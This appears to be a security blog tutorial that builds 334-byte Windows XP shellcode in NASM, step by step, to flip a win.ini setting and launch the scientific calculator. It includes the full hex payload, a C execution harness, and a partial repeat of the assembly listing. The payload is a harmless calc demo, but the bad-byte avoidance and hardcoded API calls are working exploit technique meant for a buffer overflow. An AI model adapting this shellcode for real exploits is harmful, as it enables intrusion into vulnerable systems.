TL;DR The Shellcode and The Assembly (NASM)
I'll start this off by tipping my hat to @mattifestation (writer of the Exploit Monday blog) for writing this blogpost a few years ago which inspired me down this ridiculous path.
I spent the better part of my weekend wrestling with writing my own implementation of the idea for windows XP. Turns out there's a bit more involved than I originally thought. Or not, if you know about WriteProfileString(), which I discovered days later.
But first, a demo ;)

Let's dive into how it works, shall we? To the ProcMon!

Groovy. In his article @mattifestation discovers that it's a simple registry entry that gets written to, but apparently that's not the case here. Let's take a look at C:\windows\win.ini, as that looks to be the only non-binary file accessed.

Oh great. It's a configuration file. Really?
/me rages
So basically if layout=1 is in the win.ini file, then it'll display regular calc, if layout=0, it'll be scientific calc. Cool, we know what needs to happen.
Diving head first, I break the problem down into smaller steps.
- Open the file for reading and writing
- Read in the file
- Find the offset of the byte I want to change
- Change the byte
- Write the file
- WinExec() calc.exe
--- Optional ---
- Change the byte back
- Re-write the file
- Exit cleanly
Anyway, this ends up being more steps then just that, but I'll be breaking it down step-by-step.
Step 1.) Open the file for reading and writing
Here's the code to do it, it's easier to refrence if it's at the top of this section.
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;; Call CreateFileA with C:\windows\win.ini ;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
XOR EAX,EAX ; Clear EAX
MOV AX, 0x696E ; Push upper byte
PUSH EAX ; (ni..)
PUSH 0x692e6e69 ; (in.i)
PUSH 0x775c7377 ; (ws\w)
PUSH 0x6f646e69 ; (indo)
PUSH 0x775c3a43 ; (C:\w)
MOV EDX,ESP ; Store pointer into EDX
XOR EAX,EAX ; Null out EAX
PUSH EAX ; hTemplateFile = NULL
XOR EBX,EBX ; Clear EBX
MOV BL,0x80 ; Put 0x80 in lower
PUSH EBX ; PUSH EBX
PUSH byte 0x04 ; 4 = OPEN_ALWAYS
PUSH EAX ; LPSECURITY = 0
PUSH byte 0x01 ; 1 = SHARE_READ
MOV EAX,0xD1111111 ; Push 0xd1110000
SUB EAX,0x11111111 ; Sub 0x11110000 == 0xc0000000
PUSH EAX ; Push (GENERIC_READ | GENEREIC_WRITE)
PUSH EDX ; Filename
MOV EDX,0x7c802b28 ; Have to mask this for some reason
SUB DH,0x11 ; Compiler barfs at 1a, and stops :-/
CALL EDX ; Call CreateFileA()
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
So the prototype of CreateFileA() looks like the following:
HANDLE WINAPI CreateFile(
_In_ LPCTSTR lpFileName,
_In_ DWORD dwDesiredAccess,
_In_ DWORD dwShareMode,
_In_opt_ LPSECURITY_ATTRIBUTES lpSecurityAttributes,
_In_ DWORD dwCreationDisposition,
_In_ DWORD dwFlagsAndAttributes,
_In_opt_ HANDLE hTemplateFile
);
So what we're essentially doing in the above code is this:
HANDLE fHandle = CreateFile(
"C:\\windows\\win.ini", // lpFileName | Path to our file
(GENERIC_READ | GENERIC_WRITE), // dwDesiredAccess | == 0xc0000000 (generic everything)
SHARE_READ, // dwShareMode | == 0x00000001 (allows other programs to open for reading)
NULL, // lpSecurityAttributes | == 0x00000000 (don't need it)
OPEN_ALWAYS, // dwCreationDisposition | == 0x00000004 (tries to open the file no matter what)
FILE_ATTRIBUTE_NORMAL, // dwFlagsAndAttributes | == 0x00000080 (normal file, nothing special about it)
NULL, // hTemplateFile | == 0x00000000 (don't need a template file)
);
After we make a CALL to CreateFileA() with these arguments pushed onto the stack, we're given back a valid file handle (stored in EAX). Horay!
One very important thing to note is how I pushed the arguments onto the stack. I imagine turning the function 90 degrees clockwise, and having it sit on top of the stack. Your arguments need to line up like that, and since you PUSH things onto the stack, it grows down. This is the reason why we put the first argument (filename) in last.
Step 2.) Read in the file
This actually needs to be broken down into multiple sections, since "reading a file" isn't quite so simple in assembly.
Step 2a.) Get the file size
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;; Call GetFileSize([HANDLE]"C:\windows\win.ini") ;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
PUSH EAX ; Push File Handle (later storage)
XOR ECX,ECX ; Clear ECX
PUSH ECX ; Push 0
PUSH EAX ; Push File Handle argument
MOV ESI,0x7c810fef ; Call GetFileSize()
CALL ESI ;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
The prototype for this function looks like this:
DWORD WINAPI GetFileSize(
_In_ HANDLE hFile,
_Out_opt_ LPDWORD lpFileSizeHigh
);
Our assembly is farily straight-forward, since EAX still holds our file handle, we just push it onto the stack for future use (we WILL need it later on), and call GetFileSize() like this:
GetFileSize(
fHandle, // hFile | Our file handle (duh)
NULL // NULL | No need to store the filesize, it'll be in EAX
);
Step 2b.) Allocate the size of the file +1
Now we need somewhere to put this file before we can read it into memory, so we have to use our old friend malloc() to allocate a buffer for us somewhere. We want to use our (file size + 1) so after we set the buffer to all NULLs the file contents will absoultely be null-terminated.
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;; Call malloc() with file size +1 ;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
INC EAX ; EAX == File size (add one to it for null terminator)
PUSH EAX ; Push FileSize + 1 as argument
MOV ESI,0x77c2c407 ; Pointer to malloc()
CALL ESI ; Call malloc()
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
Malloc() takes one argument, the desired size of the buffer, so there's not much explaining that needs to happen. EAX holds our desired size at this point.
After the call, this returns a pointer to our allocated buffer into EAX for further use!
Step 2c.) Zero out the memory for good measure (make sure it's null terminated!)
I'm not entirely convinced that this is necessary, but it has the potential to cause issues without it if WriteFile is looking for a null terminator. Zeroing this out also helped me confirm I was in the right place while debugging.
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;; Call memset() to zero out our buffer ;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
XOR ECX,ECX ; Clear ECX
MOV EDX,[ESP] ; Put FileSize + 1 as the buffer size into EDX
PUSH EDX ; Push FileSize + 1 as an argument
PUSH ECX ; Fill with 0's
PUSH EAX ; Start at begining of malloc()'d memory
MOV ESI,0x77c475f0 ; Pointer to memset()
CALL ESI ; Call memset()
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
The memset() prototype:
void *memset(
void *dest,
int c,
size_t count
);
The call we replicate:
memset(
*dest, // Pointer to our malloc()'d buffer.
NULL, // Fill memory space with NULLs
sizeof(file+1) // Our filesize + 1
)
After we make the call, you can verify that the memory is zero'd out by following the pointer returned from malloc(), you should see a whole mess of NULLs :)
Step 2d.) Random pointer juggling
At this point we need to pop some things off the stack for our ReadFileA() call
;;;;;;;;;;;;;;;;;;;;;;;;;
;; Random Juggle time! ;;
;;;;;;;;;;;;;;;;;;;;;;;;;
MOV ECX,[ESP-0x10] ; Put file size into ECX
PUSH ECX ; Push a dummy value so we don't try ESP+10 (has a \x0a in it :-/)
MOV EDX,[ESP+0x14] ; Put file handle to EDX
;;;;;;;;;;;;;;;;;;;;;;;;;
I had to do something interesting by pushing an unused value down onto the stack, that's because the disassembly of MOV EDX,[ESP+0x14] contains a \x0a character, which was giving me trouble since while writing this for a string-based buffer-overflow, it was causeing my shellcode to truncate. Sad panda.
This is also pretty self explanatory, and now at this point ECX == File size, and EDX == Our file handle
Step 2e.) Call ReadFileA() to finally read the file in!
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;; Call ReadFileA('C:\test.txt') into malloc() from above ;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
XOR ESI,ESI ; Clear ESI
PUSH ESI ; Push a null onto the stack (address to be saved later)
PUSH ESI ; (NULL) _Inout_opt_ LPOVERLAPPED lpOverlapped
MOV ESI,ESP ; Move ESP -> ESI
ADD ESI, byte 0x04 ; Add 0x04 to our ESP
PUSH ESI ; (Pointer to 0x0) _Out_opt_ LPDWORD lpNumberOfBytesRead,
PUSH ECX ; (FSiZ) _In_ DWORD nNumberOfBytesToRead,
PUSH EAX ; (BUFF) _Out_ LPVOID lpBuffer,
PUSH EDX ; (HNDL) _In_ HANDLE hFile,
MOV ESI,0x7c801812 ; Pointer to ReadFileA()
CALL ESI ; Call ReadFileA()
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
Same drill as before, the prototype:
BOOL WINAPI ReadFile(
_In_ HANDLE hFile,
_Out_ LPVOID lpBuffer,
_In_ DWORD nNumberOfBytesToRead,
_Out_opt_ LPDWORD lpNumberOfBytesRead,
_Inout_opt_ LPOVERLAPPED lpOverlapped
);
And the call we're making:
ReadFile(
fHandle, // FileHandle | Our file handle for C:\windows\win.ini
MallocBuf, // Pointer | Our pointer to our malloc()'d/zero'd buffer
BytesToRead, // sizeof(file) | The number of bytes we want to read in (the whole file)
BytesRead, // Pointer | A pointer to hold the number of bytes read, since this returns BOOL
lpOverlapped, // NULL | If we used an overlapped flag with CreateFile() this would be necessary
)
After that our buffer is magically filled with the file contents, and we're one step closer to poping a scientific calc!
Step 3.) Find the offset to the byte I want to change
I optioned the strstr() function to do this, but there are many ways to do this. This just seemed the easiest
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;; Call strstr('[SciCalc]',$filecontents) ;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
MOV EAX,[ESP-0x10] ; Pop out location to the file contents into EAX
PUSH byte 0x5d ; 0x0000005d ( ]) ;)
PUSH 0x636c6143 ; (Calc)
PUSH 0x6963535b ; ([Sci)
MOV EBX,ESP ; Put pointer to our string into EBX
PUSH EBX ; String to be Scanned
PUSH EAX ; String to match
MOV ESI,0x77c47c60 ; Pointer to strstr()
CALL ESI ; Call strstr()
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
For brevity sake, this is just s string match, so I push in the pointer to the string I'm trying to match ([SciCalc]), and the string to match against (the file contents), and it gives me a pointer to the string in EAX
Step 4.) Change that byte!
Next we want to skip ahead until we hit our single byte we want ot change (0x31 or ascii "1"), then use memset() again to change that single byte to 0x30 (ascii "0")
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;; Set our byte to 0 with memset() ;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
ADD EAX, byte 0x12 ; Move pointer 0x12 ahead (skip to 0/1)
PUSH byte 0x01 ; Change one byte
PUSH byte 0x30 ; Char to change to 0x30 (ascii "0")
PUSH EAX ; Push Memory location to change
MOV ESI,0x77c475f0 ; Pointer to memset()
CALL ESI ; Call memset()
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
At this point the function calls are using nothing but pointers, file handles, and the random integer/dword, so it's probably not too helpful to keep showing the calls we're making. The prototype for memset() is up above if you need it.
Step 5.) Write the file back to disk
Another 2 parter. After reading the file to the disk, it turns out our file pointer is at the end of the file! So if we write it back now, we end up just appending our data. We want to replace!
Step 5a.)
Here we call setFilePointer() with all nulls and our file handle to tell it to reset the file pointer to the start of the file
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;; Call setFilePointer() to reset ;;
;; file pointer to begining ;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
MOV EDX,[ESP+0x38] ; Find handle on stack
XOR EAX,EAX ; Clear EAX
PUSH EAX ; dwMoveMethod (FILE_BEGIN)
PUSH EAX ; lpDistanceToMoveHigh (0)
PUSH EAX ; lDistanceToMove (0)
PUSH EDX ; hFile
MOV ESI,0x7c811106 ; Call setFilePointer()
CALL ESI ;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
BOOM! Easy.
Step 5b.)
Now we can actually call WriteFileA() to write our file back to the filesystem
;;;;;;;;;;;;;;;;;;;;;;
;; Call writeFile() ;;
;;;;;;;;;;;;;;;;;;;;;;
XOR EAX,EAX ; Blank out EAX
PUSH EAX ; lpOverlapped = NULL
MOV EAX,ESP ; Push current stack pointer as a "NumberOfBytesWritten" variable
XOR ECX,ECX ; Blank out ECX
PUSH ECX ; lpOverlapped == NULL
PUSH EAX ; lpNumberOfBytesWritten == Pointer -> 0
MOV ECX,[ESP+0x2C] ; Move file size into ECX
MOV EDX,[ESP+0x18] ; Move pointer to file data into EDX
MOV ESI,[ESP+0x44] ; Move file handle into ESI
PUSH ECX ; nNumberOfBytesToWrite
PUSH EDX ; lpBuffer
PUSH ESI ; hFile
MOV ESI,0x7c8112ff ; Call writeFile()
CALL ESI ;
;;;;;;;;;;;;;;;;;;;;;;
The prototype for WriteFileA() is:
BOOL WINAPI WriteFile(
_In_ HANDLE hFile,
_In_ LPCVOID lpBuffer,
_In_ DWORD nNumberOfBytesToWrite,
_Out_opt_ LPDWORD lpNumberOfBytesWritten,
_Inout_opt_ LPOVERLAPPED lpOverlapped
);
Pretty straight forward again, not much to note beyond the comments in the ASM.
Step 6.) Pop a calc.exe
It's time! It's finally time to pop the calc! We do so with a simple call to WinExec()
;;;;;;;;;;;;;;;;;;;;;;;;;
;; WinExec('calc.exe') ;;
;;;;;;;;;;;;;;;;;;;;;;;;;
XOR EAX,EAX ; Clear EAX
PUSH EAX ; Null terminate string
PUSH 0x6578652e ; (.exe)
PUSH 0x636c6163 ; (calc)
PUSH ESP ; Stack pointer == our data
MOV ESI,0x7c862585 ; Call WinExec()
CALL ESI ;
;;;;;;;;;;;;;;;;;;;;;;;;;
Again, should be self explanatory. Just launches calc, but since we've changed the layout parameter in win.ini, it'll spawn a scientific calculator! Horay!
Optional stuffs
From here on out, we're basically just working backwards, re-writing the byte to standard calc, resetting the file pointer, and re-writing the file. After all that we just exit(0)! Good times.
Step 7.) Change that byte back
This is the opposite of what we did in step 4, we change it back to ascii "0"
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;; Set our byte back to 1 with memset() ;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
MOV EAX,[ESP+0x0C] ; Pop pointer to "0"
PUSH byte 0x01 ; Change one byte
PUSH byte 0x31 ; Char to change to 0x31 (ascii "1")
PUSH EAX ; Push Memory location to change
MOV ESI,0x77c475f0 ; Call memset()
CALL ESI ;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
This is accomplished in much the same way, pop the pointer to our value we want to change off the stack, push the rest of our arguments (1 byte changed to 0x31), and make the call!
Step 8.) Write the file back to disk (again)
Another 2 parter, much like the original, we need to reset the file pointer first.
Step 8a.)
setFilePointer() is your friend! Especially with how few bytes it takes to call it :)
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;; Call setFilePointer() to reset ;;
;; file pointer to begining ;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
MOV EDX,[ESP+0x50] ; Find handle on stack
XOR EAX,EAX ; Clear EAX
PUSH EAX ; dwMoveMethod (FILE_BEGIN)
PUSH EAX ; lpDistanceToMoveHigh (0)
PUSH EAX ; lDistanceToMove (0)
PUSH EDX ; hFile
MOV ESI,0x7c811106 ; Pointer to setFilePointer()
CALL ESI ; Call setFilePointer()
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
Pretty self-explanatory again, just push in our file handle and a few nulls, and boom, you got yourself a stew.
Step 8b.)
Now we call WriteFile() again, literally the same exact call that we made last time.
;;;;;;;;;;;;;;;;;;;;;;
;; Call writeFile() ;;
;;;;;;;;;;;;;;;;;;;;;;
MOV EAX,ESP ; Push current stack pointer as a "NumberOfBytesWritten" variable
XOR EDX,EDX ; Clear EDX
PUSH EDX ; lpOverlapped == NULL
PUSH EAX ; lpNumberOfBytesWritten == Pointer -> 0
MOV ECX,[ESP+0x1C] ; Move file size into ECX
MOV EDX,[ESP+0x2C] ; Move pointer to file data into EDX
MOV ESI,[ESP+0x58] ; Move file handle into ESI
PUSH ECX ; nNumberOfBytesToWrite
PUSH EDX ; lpBuffer
PUSH ESI ; hFile
MOV ESI,0x7c8112ff ; Pointer to WriteFile()
CALL ESI ; Call WriteFile()
;;;;;;;;;;;;;;;;;;;;;;
Nothings changed, but our file is all cleaned up and we can finally exit!
Step 9.) Cleanup
It's always good to get here. Usually means that things didn't crash, and that your shellcode executed perfectly.
First thing we want to do is close the file handle, which if you've done any file programming, you shant need explanation of why.
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;; CloseHandle(fileHandle) ;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
MOV EAX,[ESP-0x14] ; Find handle
PUSH EAX ; Push handle onto stack
MOV ESI,0x7c809be7 ; Call CloseHandle()
CALL ESI ;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
Now that it's closed, we can finally exit our process somewhat gracefully (it is a crash afer all).
;;;;;;;;;;;;;;;;;;;;;;;;;;
;; Call ExitProccess(0) ;;
;;;;;;;;;;;;;;;;;;;;;;;;;;
XOR EAX,EAX ; Clear EAX
PUSH EAX ; Push 0x00 (exit(0))
MOV EAX,0x7c81d21b ; Avoid \x0a character
SUB AL, 0x11 ; Add mask
JMP EAX ; JMP - No turning back!
;;;;;;;;;;;;;;;;;;;;;;;;;;
A CALL would've sufficed here as well, but I figured we have no need to return! The reason I do the SUB AL,0x11 is actually because the nasm compiler seems to blarf a bit when processing certian opcodes. I haven't figured out why, so I just got around it. The final shellcode coudl very easily have just changed that value by hand to the hex equivilant, but I don't really see it as necessary, only saves a few bytes.
Ta-da! Executed scientific calc with 334 bytes of shellcode. The actual code for the exploit in the demo is even smaller because I only had ~327 bytes to work with, so I don't bother clearning some registers to get around that. You never know what sort of shape your registers are in though when you start your shellcode, so I went back and dotted the i's and crossed the t's if you will.
That was a lot of material, but hopefully it's presented clear enough that it can be deciphered after a few reads, it'll definitely help to refer to my exploitation primer part 2, so you can understand why we do some memory address juggling to remove null bytes, and how we set up our arguments for each system call we make.
Having said that though, here's the whole thing, already compiled with NASM and ready to go!
As a side-note, I added a sleep() call to delay execution just slightly after calling WinExec(). I was running into a race condition where I'd revert the change too quickly and it would read the old value.
// Scientific Calc (334 Bytes)
char code[] =
"\x31\xc0\x66\xb8\x6e\x69\x50\x68\x69\x6e\x2e\x69"
"\x68\x77\x73\x5c\x77\x68\x69\x6e\x64\x6f\x68\x43"
"\x3a\x5c\x77\x89\xe2\x31\xc0\x50\x31\xdb\xb3\x80"
"\x53\x6a\x04\x50\x6a\x01\xb8\x11\x11\x11\xd1\x2d"
"\x11\x11\x11\x11\x50\x52\xba\x28\x2b\x80\x7c\x80"
"\xee\x11\xff\xd2\x50\x31\xc9\x51\x50\xbe\xef\x0f"
"\x81\x7c\xff\xd6\x40\x50\xbe\x07\xc4\xc2\x77\xff"
"\xd6\x31\xc9\x8b\x14\x24\x52\x51\x50\xbe\xf0\x75"
"\xc4\x77\xff\xd6\x8b\x4c\x24\xf0\x51\x8b\x54\x24"
"\x14\x31\xf6\x56\x56\x89\xe6\x83\xc6\x04\x56\x51"
"\x50\x52\xbe\x12\x18\x80\x7c\xff\xd6\x8b\x44\x24"
"\xf0\x6a\x5d\x68\x43\x61\x6c\x63\x68\x5b\x53\x63"
"\x69\x89\xe3\x53\x50\xbe\x60\x7c\xc4\x77\xff\xd6"
"\x83\xc0\x12\x6a\x01\x6a\x30\x50\xbe\xf0\x75\xc4"
"\x77\xff\xd6\x8b\x54\x24\x38\x31\xc0\x50\x50\x50"
"\x52\xbe\x06\x11\x81\x7c\xff\xd6\x31\xc0\x50\x89"
"\xe0\x31\xc9\x51\x50\x8b\x4c\x24\x2c\x8b\x54\x24"
"\x18\x8b\x74\x24\x44\x51\x52\x56\xbe\xff\x12\x81"
"\x7c\xff\xd6\x31\xc0\x50\x68\x2e\x65\x78\x65\x68"
"\x63\x61\x6c\x63\x54\xbe\x85\x25\x86\x7c\xff\xd6"
"\x8b\x44\x24\x0c\x6a\x01\x6a\x31\x50\xbe\xf0\x75"
"\xc4\x77\xff\xd6\x8b\x54\x24\x50\x31\xc0\x50\x50"
"\x50\x52\xbe\x06\x11\x81\x7c\xff\xd6\x6a\x79\xbe"
"\x46\x24\x80\x7c\xff\xd6\x89\xe0\x31\xd2\x52\x50"
"\x8b\x4c\x24\x1c\x8b\x54\x24\x2c\x8b\x74\x24\x58"
"\x51\x52\x56\xbe\xff\x12\x81\x7c\xff\xd6\x8b\x44"
"\x24\xec\x50\xbe\xe7\x9b\x80\x7c\xff\xd6\x31\xc0"
"\x50\xb8\x1b\xd2\x81\x7c\x2c\x11\xff\xe0";
int main(int argc, char **argv)
{
int (*func)();
func = (int (*)()) code;
(int)(*func)();
}
A special thanks to @corelanc0d3r for the shellcode.c program. Super handy!
Just before writing this article, I digging around calc.exe to see what else it was reading out of the win.ini file, which (of course) was when I discovered the WriteProfileString function. This is the part where I facepalm.
[BITS 32]
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;; Call CreateFileA with C:\windows\win.ini ;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
XOR EAX,EAX
MOV AX, 0x696E ; Push upper byte
PUSH EAX ; (ni..)
PUSH 0x692e6e69 ; (in.i)
PUSH 0x775c7377 ; (ws\w)
PUSH 0x6f646e69 ; (indo)
PUSH 0x775c3a43 ; (C:\w)
MOV EDX,ESP ; Store pointer into EDX
XOR EAX,EAX ; Null out EAX
PUSH EAX ; hTemplateFile = NULL
XOR EBX,EBX ; Clear EBX
MOV BL,0x80 ; Put 0x80 in lower
PUSH EBX ; PUSH EBX
PUSH byte 0x04 ; 4 = OPEN_ALWAYS
PUSH EAX ; LPSECURITY = 0
PUSH byte 0x01 ; 1 = SHARE_READ
MOV EAX,0xD1111111 ; Push 0xd1110000
SUB EAX,0x11111111 ; Sub 0x11110000 == 0xc0000000
PUSH EAX ; Push (GENERIC_READ | GENEREIC_WRITE)
PUSH EDX ; Filename
MOV EDX,0x7c802b28 ; Have to mask this for some reason
SUB DH,0x11 ; Compiler barfs at 1a, and stops :-/
CALL EDX ; Call CreateFileA()
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;; Call GetFileSize([HANDLE]"C:\windows\win.ini") ;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
PUSH EAX ; Push File Handle (later storage)
XOR ECX,ECX ; Clear ECX
PUSH ECX ; Push 0
PUSH EAX ; Push File Handle argument
MOV ESI,0x7c810fef ; Pointer to GetFileSize()
CALL ESI ; Call GetFileSize()
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;; Call malloc() with file size +1 ;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
INC EAX ; EAX == File size (add one to it for null terminator)
PUSH EAX ; Push FileSize + 1 as argument
MOV ESI,0x77c2c407 ; Pointer to malloc()
CALL ESI ; Call malloc()
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;; Call memset() to zero out our buffer ;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
XOR ECX,ECX ; Clear ECX
MOV EDX,[ESP] ; Put FileSize + 1 as the buffer size into EDX
PUSH EDX ; Push FileSize + 1 as an argument
PUSH ECX ; Fill with 0's
PUSH EAX ; Start at begining of malloc()'d memory
MOV ESI,0x77c475f0 ; Pointer to memset()
CALL ESI ; Call memset()
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;
;; Random Juggle time! ;;
;;;;;;;;;;;;;;;;;;;;;;;;;
MOV ECX,[ESP-0x10] ; Put file size into ECX
PUSH ECX ; Push a dummy value so we don't try ESP+10 (has a \x0a in it :-/)
MOV EDX,[ESP+0x14] ; Put file handle to EDX
;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;; Call ReadFileA('C:\windows\win.ini') into malloc() from above ;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
XOR ESI,ESI ; Clear ESI
PUSH ESI ; Push a null onto the stack (address to be saved later)
PUSH ESI ; (NULL) _Inout_opt_ LPOVERLAPPED lpOverlapped
MOV ESI,ESP ; Move ESP -> ESI
ADD ESI, byte 0x04 ; Subtract 0x04 from our ESP
PUSH ESI ; (Pointer to 0x0) _Out_opt_ LPDWORD lpNumberOfBytesRead,
PUSH ECX ; (FSiZ) _In_ DWORD nNumberOfBytesToRead,
PUSH EAX ; (BUFF) _Out_ LPVOID lpBuffer,
PUSH EDX ; (HNDL) _In_ HANDLE hFile,
MOV ESI,0x7c801812 ; Pointer to ReadFileA()
CALL ESI ; Call ReadFileA()
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;; Call strstr('[SciCalc]',$filecontents) ;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
MOV EAX,[ESP-0x10] ; Pop out location to the file contents into EAX
PUSH byte 0x5d ; 0x0000005d ( ]) ;)
PUSH 0x636c6143 ; (Calc)
PUSH 0x6963535b ; ([Sci)
MOV EBX,ESP ; Put pointer to our string into EBX
PUSH EBX ; String to be Scanned
PUSH EAX ; String to match
MOV ESI,0x77c47c60 ; Pointer to strstr()
CALL ESI ; Call strstr()
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;; Set our byte to 0 with memset() ;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
ADD EAX, byte 0x12 ; Move pointer 0x12 ahead (skip to 0/1)
PUSH byte 0x01 ; Change one byte
PUSH byte 0x30 ; Char to change to 0x30 (ascii "0")
PUSH EAX ; Push Memory location to change
MOV ESI,0x77c475f0 ; Pointer to memset()
CALL ESI ; Call memset()
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;; Call setFilePointer() to reset ;;
;; file pointer to begining ;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
MOV EDX,[ESP+0x38] ; Find handle on stack
XOR EAX,EAX ; Clear EAX
PUSH EAX ; dwMoveMethod (FILE_BEGIN)
PUSH EAX ; lpDistanceToMoveHigh (0)
PUSH EAX ; lDistanceToMove (0)
PUSH EDX ; hFile
MOV ESI,0x7c811106 ; Call setFilePointer()
CALL ESI ;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;
;; Call writeFile() ;;
;;;;;;;;;;;;;;;;;;;;;;
XOR EAX,EAX ; Blank out EAX
PUSH EAX ; lpOverlapped = NULL
MOV EAX,ESP ; Push current stack pointer as a "NumberOfBytesWritten" variable
XOR ECX,ECX ; Blank out ECX
PUSH ECX ; lpOverlapped == NULL
PUSH EAX ; lpNumberOfBytesWritten == Pointer -> 0
MOV ECX,[ESP+0x2C] ; Move file size into ECX
MOV EDX,[ESP+0x18] ; Move pointer to file data into EDX
MOV ESI,[ESP+0x44] ; Move file handle into ESI
PUSH ECX ; nNumberOfBytesToWrite
PUSH EDX ; lpBuffer
PUSH ESI ; hFile
MOV ESI,0x7c8112ff ; Call writeFile()
CALL ESI ;
;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;
;; WinExec('calc.exe') ;;
;;;;;;;;;;;;;;;;;;;;;;;;;
XOR EAX,EAX ; Clear EAX
PUSH EAX ; Null terminate string
PUSH 0x6578652e ; (.exe)
PUSH 0x636c6163 ; (calc)
PUSH ESP ; Stack pointer == our data
MOV ESI,0x7c862585 ; Call WinExec()
CALL ESI ;
;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;; Set our byte back to 1 with memset() ;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
MOV EAX,[ESP+0x0C] ; Push pointer to 0
PUSH byte 0x01 ; Change one byte
PUSH byte 0x31 ; Char to change to 0x30 (ascii "0")
PUSH EAX ; Push Memory location to change
MOV ESI,0x77c475f0 ; Call memset()
CALL ESI ;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;; Call setFilePointer() to reset ;;
;; file pointer to begining ;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
MOV EDX,[ESP+0x50] ; Find handle on stack
XOR EAX,EAX ; Clear EAX
PUSH EAX ; dwMoveMethod (FILE_BEGIN)
